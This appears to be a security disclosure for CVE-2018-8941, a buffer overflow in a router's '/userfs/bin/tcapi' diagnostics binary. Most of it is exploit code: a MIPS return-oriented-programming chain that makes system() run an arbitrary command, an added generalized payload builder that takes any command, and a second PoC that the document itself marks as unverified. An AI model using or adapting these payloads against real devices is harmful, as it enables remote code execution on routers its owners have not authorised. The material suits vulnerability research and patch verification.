Adam Simuntis :: https://twitter.com/adamsimuntis
Mindaugas Slusnys :: https://twitter.com/mislusnys
The buffer overflow vulnerability was found in the "/userfs/bin/tcapi" binary, which is used as a wrapper for the "Diagnostics" functionality in the Web GUI.
An authenticated user can pass a long buffer as the 'Addr' parameter to the '/userfs/bin/tcapi' binary via the 'set Diagnostics_Entry' function and cause memory corruption. Furthermore, it is possible to redirect the program's control flow and execute arbitrary code.
Vulnerability PoC
https://github.com/SECFORCE/CVE-2018-8941
Executing 'system("reboot;")' looks like this:
import struct

# Since we are exploiting through the Web GUI, the process mappings
# (/proc/`pidof boa`/maps) were taken from the '/userfs/bin/boa' web server process.
libc_base = 0x2b02b000
# 0x59bb0 is the offset of system() in libc; the target is big-endian MIPS, hence ">I"
libc_system = struct.pack(">I", libc_base + 0x59bb0)
rop_pad = b'A' * 580
# 3rd: jump to system() from libc, $a0 holds the argument
s0 = libc_system
# 2nd: move the stored command pointer from $a1 to $a0, then jump to the next gadget in $s0 -> system(cmd)
# .text:00041980 move $a0, $a1
# .text:00041984 li $a2, 0xC
# .text:00041988 move $t9, $s0
# .text:0004198C jalr $t9 ; memset
s1 = struct.pack(">I", libc_base + 0x41980)
s2 = b'BBBB'  # $s2, unused
s3 = b'CCCC'  # $s3, unused
# 1st: load the address of the command stored on the stack (IDA's 0x168+var_150, i.e. $sp+0x18)
# into $a1, then jump to the next gadget in $s1
# .text:0000C654 addiu $a1, $sp, 0x168+var_150
# .text:0000C658 move $t9, $s1
# .text:0000C65C jalr $t9 ; stat64
ra = struct.pack(">I", libc_base + 0xC654)
# The command is repeated so that a complete "reboot;" token is present wherever $sp+0x18 lands inside it.
payload = rop_pad + s0 + s1 + s2 + s3 + ra + b"reboot;" * 10
To run a different command, replace the "reboot;" string at the end of the payload:
payload = rop_pad + s0 + s1 + s2 + s3 + ra + b"reboot;" * 10
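As an added example (not part of the SECFORCE PoC or of this page's original code), the following Python 3 helper generalizes the chain above: it assembles the same layout (580-byte pad, $s0..$s3, $ra, command) for any libc base and command, and models why the command string has to be repeated. It assumes that IDA's operand 0x168+var_150 resolves to the immediate 0x18, and that after the vulnerable function's epilogue $sp points at the byte following the saved $ra; the padding length and gadget offsets are the ones from the PoC above.

```python
import struct

# Constants from the PoC above; A1_SP_DISP is derived from the IDA operand
# 0x168+var_150 = 0x18 (assumption, see lead-in).
PAD_LEN = 580             # bytes of padding before the saved $s0 slot
SYSTEM_OFF = 0x59bb0      # libc offset of system()
MOVE_A0_A1_OFF = 0x41980  # gadget: move $a0,$a1 ; li $a2,0xC ; move $t9,$s0 ; jalr $t9
ADDIU_A1_SP_OFF = 0xC654  # gadget: addiu $a1,$sp,0x18 ; move $t9,$s1 ; jalr $t9
A1_SP_DISP = 0x18         # what the addiu gadget adds to $sp
SAVED_SLOTS = 5           # $s0, $s1, $s2, $s3, $ra


def p32(value):
    """Pack a 32-bit word big-endian, as the target MIPS CPU expects."""
    return struct.pack(">I", value & 0xFFFFFFFF)


def build_payload(libc_base, cmd, repeat=10):
    """Assemble pad | $s0 | $s1 | $s2 | $s3 | $ra | cmd;cmd;... for the given libc base.

    The command is repeated because the addiu gadget points $a1 at a fixed
    offset into the bytes following $ra: a repeated "cmd;" string guarantees
    that a complete token follows whatever fragment that offset lands on.
    """
    cmd_bytes = cmd.encode() + b";"
    chain = (
        p32(libc_base + SYSTEM_OFF)         # $s0: final target, system()
        + p32(libc_base + MOVE_A0_A1_OFF)   # $s1: 2nd gadget, $a0 = $a1, then jalr $s0
        + b"BBBB"                           # $s2: unused
        + b"CCCC"                           # $s3: unused
        + p32(libc_base + ADDIU_A1_SP_OFF)  # $ra: 1st gadget, $a1 = $sp+0x18, then jalr $s1
    )
    return b"A" * PAD_LEN + chain + cmd_bytes * repeat


def string_passed_to_system(payload):
    """Model the C string system() receives.

    After the epilogue $sp points just past the saved $ra (assumption), so the
    first gadget sets $a1 = that address + 0x18; the string runs to the end of
    the payload, where the first NUL byte would follow.
    """
    sp_after_return = PAD_LEN + SAVED_SLOTS * 4
    return payload[sp_after_return + A1_SP_DISP:]


def has_complete_command(payload, cmd):
    """True if the shell will see a full `cmd` token.

    A leading fragment such as "oot" simply fails as an unknown command; the
    shell continues past the ';' and runs the next, complete token.
    """
    tokens = string_passed_to_system(payload).split(b";")
    return cmd.encode() in tokens


if __name__ == "__main__":
    pl = build_payload(0x2b02b000, "reboot")
    print(string_passed_to_system(pl))           # b'oot;reboot;reboot;...'
    print(has_complete_command(pl, "reboot"))    # True
    # A single copy of the command is entirely skipped over by the 0x18 displacement.
    print(has_complete_command(build_payload(0x2b02b000, "reboot", repeat=1), "reboot"))  # False
```

With the PoC's libc base the string handed to system() starts 24 bytes into "reboot;" * 10, i.e. at "oot;reboot;...", which is why a single copy of the command would never execute and the original payload repeats it.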
PoC 2 (not yet verified)
ls command:
#!/usr/bin/env python3
import struct

libc = 0x40868000
s0 = struct.pack(">I", libc + 0x59bb0)   # system() (0x408C1BB0, same libc offset as in PoC 1)
s1 = struct.pack(">I", 0x41414141)       # $s1, unused
s2 = struct.pack(">I", 0x43434343)       # $s2, unused
s3 = struct.pack(">I", 0x44444444)       # $s3, unused
ra = struct.pack(">I", libc + 0x1656C)   # gadget 1 (0x4087E56C); a different gadget from PoC 1, not yet verified
x = b"A" * 580 + s0 + s1 + s2 + s3 + ra + b"x" * 16 + b"ls"